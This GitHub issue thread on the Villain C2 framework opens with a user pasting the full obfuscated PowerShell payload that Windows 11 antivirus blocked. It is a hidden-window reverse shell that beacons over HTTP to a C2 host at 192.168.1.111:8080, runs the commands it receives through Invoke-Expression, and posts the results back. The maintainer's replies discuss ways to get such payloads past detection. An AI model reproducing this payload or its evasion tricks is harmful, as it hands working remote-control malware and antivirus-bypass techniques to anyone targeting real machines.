t3l3machus / Villain

Villain is a high level stage 0/1 C2 framework that can handle multiple reverse TCP & HoaxShell-based shells, enhance their functionality with additional features (commands, utilities) and share them among connected sibling servers (Villain instances running on different machines).
Other
3.77k stars 611 forks source link

Obfuscated payload detected by Windows 11 #46

Closed timgerstel closed 1 year ago

timgerstel commented 1 year ago
S't'aR'T-pRO'CeSS $PSHOME\powershell.exe -aRgUMentList {$23b3d0='192.168.1.111'+':808'+'0';$5c98='07932e8b-b'+'b2bacb8-1'+'54b'+'7'+'992';$038f0='h'+'tt'+'p:'+'//';$f84bfb=i'rM' -UsEBaSICpArsiNg -uri $038f0$23b3d0/07932e8b/$env:coMpUteRNaME/$env:usErNAMe -hEadeRS @{"Authorization"=$5c98};for (;;){$1=(i'rM' -UsEBaSICpArsiNg -uri $038f0$23b3d0/bb2bacb8 -hEadeRS @{"Authorization"=$5c98});if ($1 -Ne ('Non'+'e')) {$1d=iNV'OkE-EXPrEsS'IoN $1 -erROrAcTiON ST'Op' -erRORVArIABLe 1ce;$1d=OUT-'StR'INg -inPuTOBjeCt $1d;$c186d=i'rM' -uri $038f0$23b3d0/154b7992 -METHoD POST -hEadeRS @{"Authorization"=$5c98} -BOdy ([SYsTeM.tEXt.encOdINg]::UTf8.getbYTes($1ce+$1d) -jOIn ' ')} s'lEep' 0.8}} -WindoWSTyle HI'dd'EN

At line:1 char:1
+ S't'aR'T-pRO'CeSS $PSHOME\powershell.exe -aRgUMentList {$23b3d0='192. ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent
timgerstel commented 1 year ago

Edit: this is resolved by https://github.com/t3l3machus/Villain/pull/41

t3l3machus commented 1 year ago

@timgerstel that pull request is proposing a change i have demonstrated in the video mentioned on top of the README in which I present ideas to bypass detection. Secondly, the change doesn't resolve anything, this variation will start getting caught as well, especially if I merge.

timgerstel commented 1 year ago

@t3l3machus I see, the notion of creating your own templates and keeping them offline makes complete sense. I am not too familiar with powershell's scripting language so I was just looking for a quick copy/pasteable working demo.

This project Is quite impressive, looking forward to see where you take it in the future.